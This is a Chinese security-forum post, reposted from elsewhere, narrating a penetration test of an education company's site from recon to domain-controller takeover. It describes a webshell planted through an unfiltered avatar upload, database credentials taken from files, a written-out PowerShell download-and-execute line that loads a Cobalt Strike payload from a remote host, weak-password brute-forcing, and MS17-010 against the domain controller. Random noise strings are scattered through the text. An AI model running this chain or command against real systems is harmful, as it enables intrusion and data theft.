找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2135|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

8 z+ H1 t, {! a/ G* a% ^ 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 ! j* h) @. i# K

5 c$ A2 k c0 E; b5 r' @$ T9 n: V/ |

7 y D9 d& A, L: z8 m) {0 M  0 N$ }, n$ m e* M$ _) x2 a) Q

6 L& e( y: J9 e& B

* ?1 L# y, p+ u$ Q P" X 正文4 g' h* Z- j G' P, j

7 t2 P* @* W3 H2 n' [% {1 C

1 _, H& Z$ s9 A8 @: i% {2 x4 l   : v8 P4 ^1 ?0 N6 w

5 J/ x5 a, N: G- L, K& A

% K! g" X6 ^" d" b9 }+ j 目标:www.xxxx.com(一家教育机构)
9 O& f* j- {- h2 a" [/ |! {
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
& Q1 R/ }# ?5 z5 ~- B0 Y

5 S: R/ Z; E5 G3 q) w

`5 D9 I1 x0 _" T vshapes= $ w. f; e5 i9 q( }

+ O2 g0 P0 H$ K3 Q' r0 z0 O" {

+ t: B2 a, z9 g$ [ 进行了简单的信息搜集
% ^0 T1 f+ Z; U0 p& n
3 o- p3 H: h. I4 q9 q4 x
& _. z7 c4 U6 b

, `( A% B2 r' e# y% z4 }) u

6 K( p) N+ `& R! P* u# W% v 子域名搜集 2 U( f7 `: T0 E8 J! K

: `5 C( V* f% T

8 C; I/ l" h) e3 E3 a$ V% Z$ a5 E, ] vshapes= z" J7 H+ V5 V" g( h

0 }- R* X& p& k0 i8 f5 u9 l$ U1 D

A+ t" A5 P6 p; x% Y fofa找资产
% m# e7 e6 n2 d8 j3 j( e+ P
9 L: i: O! N5 `, C% E/ X1 _+ A- h9 y; J$ w; G
( y; _0 I: p+ |6 ]

* |6 ^* G: i1 ~

. [1 r1 E; ]* U7 P vshapes=; Y8 [; J2 X9 K+ {

% y$ R9 x3 g7 ]0 d

6 i# [1 Q* g- n9 I- m 一共七个资产。去重之后只有两个。
3 e) Y& r! J" x" _% c* T, r
$ }8 H$ a% c+ X; L9 l/ J" l% @
: t P/ E c) \. S6 V2 V# C- M5 W% A

4 S! R: P4 M Z# {) K! t- j

; S; I( U# B% ^' O1 D 目录探测 - O: D; j& d* l; X

! {0 q3 a" M2 j7 I2 u" f9 F

5 K* ^9 a3 l0 K vshapes=3 O4 C* E' X2 e; X& y

6 B0 p0 }0 `: M/ W

S& R4 t3 X$ c' I 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
" S6 m9 }1 ~3 c6 t7 q# b& X0 |
5 n; L& j$ ?2 f+ o2 f8 q( f1 O
) m/ N; T$ l N

4 w, s2 }* h" I( N0 g# x

# Q- _( J q- |1 A4 g3 K5 l 我又尝试了通过修改返回包来绕过登录界面 + W9 K- K' B( O

: _! L- p# c" K7 ^" I) |

) `% P7 E! j- q9 ^* J1 A. i* ?6 u vshapes=, z( w0 F. ~* A X! X

. @9 y/ n2 o, o; {

( f- U5 i; H$ Z- E7 ^ 还是不行,尝试注入无果, R5 G( G1 S H! ~. o; N- B

% }& t! e+ C- Q6 L) C% V

2 G! B9 O! |) N2 ?4 W. w% _( ~ vshapes=) w. ~. r' u, i! z

! ^* i% q3 q( w( f6 s- ]7 l

! r) Y9 D5 @: x5 N. E/ v1 v 不过我目录探测出了一处Spring信息泄露
' N7 @" p9 [' u- u6 L
7 W7 d4 u* C) q. E
6 m* Y3 |% g9 K }

) o% N" P3 x& N9 H/ r

4 \+ ?5 Q! m# |, j vshapes= + t* J3 z0 k+ {1 T1 I

. M5 |1 S- C) p# P% [

! w* r% y8 ~- p: {. ]. @) ~ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 . x, G9 z' r# U

5 P6 Y& O1 o' }' U# e% Q3 g$ N

+ n. b: V" K8 |2 y8 l* I vshapes= ) a9 m, w, U1 a; n- K& E: G4 Y

4 C% @- }1 }5 D

7 H! S6 ]0 o ~ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。; C3 T# C& V) _/ o ]0 _4 m

; r. s' E2 {2 y1 ^) D

3 ?& z+ H* e2 H- w. l$ M: H. ]7 l* p vshapes=5 b1 }7 y( c! j( {5 h

3 o! \( G' S! E f, B# \: w. w

2 r$ U$ Y8 Y8 D( _( A. w* ? 获取有些师傅到这一步就手机抓包电脑测了。% l- f2 o6 K( b1 C

& q" G1 M B( e7 F' h' n. A

9 f. S# ]: J. s6 M' l& [! e Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 ) C. A4 X$ e; {" F3 A! a( R r0 z8 a

. t. t% Y/ p& c% _

1 \5 [+ @ k K v 其中在一个公众号发现了小程序,可以进行注册。 F2 f2 h$ O5 z1 c( p- V8 B# D

% @) p6 ^- g: N% T$ `

+ G {$ M9 D3 Y 看到了头像上传,尝试上传获取WebShell 7 l0 D5 `0 u# W2 q% `- L

0 x7 a8 n6 D" ^6 M

7 X& J9 G0 U# u& L vshapes=* f# [4 y E7 Q) }; G; y

. E. |6 a# d, t6 r4 `

8 ]2 U4 t! D& x, ^ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问( V6 z8 Q7 g8 t1 N1 ]8 n6 w! A

. d3 ]+ q! w& |7 C8 J

7 v. [0 ~* v$ X/ e2 d vshapes= 3 B* M/ S7 A3 P" O* P

8 D k! H$ U' V ?( V. R0 m

3 C6 V/ s7 f8 _$ }2 y2 z1 E 然后上了大马 ) }* |, ^: a1 Z* U9 |" _

. A8 t! s) A* d' h2 B7 \/ G/ n

0 W" t7 V8 o/ L# ^ vshapes=, L5 G' G$ x8 i$ R- W x

! i% {" a. J! f h) K

) C& u9 r3 R, i9 Y# R9 W P vshapes= / V- Q. f" M& \+ q

2 x' ?# d; `+ H/ o

- W1 t, |9 U2 m2 C: _9 r0 C" ?' W$ z6 ~ 通过翻找文件发现数据库账号密码 8 q, v) I& J8 ~) B) J- x5 b

* [. R0 J" q; O" ^3 l# |

& @( C7 a8 X; d vshapes=' B2 Z. Q6 A& j% Z

5 v3 k0 q" ^5 }1 F5 F3 c

6 T9 {7 H3 R- q, R$ Z8 K. @ --内网渗透 1 p4 j) L4 d; ~7 f+ T

- A! Z3 k, }( s: g& n" O9 f

3 t5 l1 w9 l9 @+ O& ?1 U# F 直接通过powershell执行 cs上线7 i/ m; r( G. ]) ]+ w, ]" E7 D

1 ^$ S! f1 m3 w& P, h4 W6 w8 Z

( ^' d4 N: u$ ` w powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"+ w V6 p. `. z7 ]2 F

6 V; ]# [. t) I- Y1 Q

3 O7 w& `+ G* K0 l" \! ? vshapes=5 h c! p( Y4 I. f/ w

- [- O/ `6 w; q6 u

& n& v3 a% S' [( F/ W1 b 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 - `# ^- m& B3 Q

) Q! Y0 Q0 A3 ]0 J

1 C; O3 W( P% ~- s0 N( R vshapes= 1 K$ h- d( b9 t$ S) i6 H* k2 {

( S( P/ E$ S' g5 ~) U: g& D) Q0 W

" j+ H2 G) T* b @ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
' y; k7 m7 @! q; |2 v2 i" k
2 z8 T0 p5 ?3 k g) S# W
+ K* W) e( q0 H
' {6 d! l0 q, d# k9 q' R

/ t/ k* C/ E9 X& n

) M0 E& g! Q5 f, ] M- L vshapes= 7 u" n4 c' \+ w8 r

, C( t7 J4 j3 Y& [* }

$ X4 ~! a7 Z9 H7 o8 t 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
- b+ I7 T' X- r, } E! v
1 B0 o3 d6 J. T% K" H) S# g, ?* J
9 H$ ?9 U1 _3 K4 ~$ A

2 k Y0 | Z3 z2 M

, m2 M$ f# i% H- e; r3 V! O vshapes=1 @8 T' {3 N( L/ d N8 G6 ~8 `9 F- R

7 n- P7 k6 t. y

# F, E/ L& `9 N
( {& u9 s& G0 l2 N3 J9 \. u1 j( P
5 y+ r3 y8 T& ^/ q
: k: ]( f8 s8 [1 T( x6 ]7 A

$ | n5 O& B. _. }

2 d& g! n9 T3 p# Z5 f1 l   . T! Y. |0 d5 {+ A; a% G

4 k% y9 z; d* x1 e+ p2 N/ O0 }

' G4 p) }$ a1 V! O& M7 ? 小结 ' `+ O$ i) ^# E2 t1 D9 R C) h

4 K- m# t; D3 U1 Y0 o( V

, ~5 v7 h, C+ @; d/ f& a. e5 p+ X3 W  + a* ^7 T6 i' T1 N! ?1 M

; s& ?5 `' U: w$ I

- X& y0 a9 o v, R7 D 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! - V* m6 \# v6 I) e7 o& b. y

E" O N+ |0 k% V

, ]( {$ V, W: d% j" X  ; D6 ^8 L# h% d, D

3 g+ Q B; d8 N0 S5 B$ v5 l
    ; }1 J3 L: G2 P5 L
  • 9 m: s# U; [& D' ` e: d. Z  ( x Z9 @: B0 _9 v9 _/ H. M% V
  • ) x* n3 Q7 O# L9 h* w2 y; y
  • 7 ^! Q- _/ Z8 S! |& G# o  . l/ d0 b; e+ q4 A" e9 G
  • , c$ s7 b s" e s5 b' U- k" U3 C
% ` A. d; y5 ~9 f" U# H' q4 b

& X9 W6 e; z$ S, X. P7 A5 l# U 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html * Z' }% ~) X" ]( t8 c% H6 I

% e1 H' J7 R, r; r( [

& U8 n4 k0 Q8 z  # X' f& C! X0 w: N: T9 ?# [1 [

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表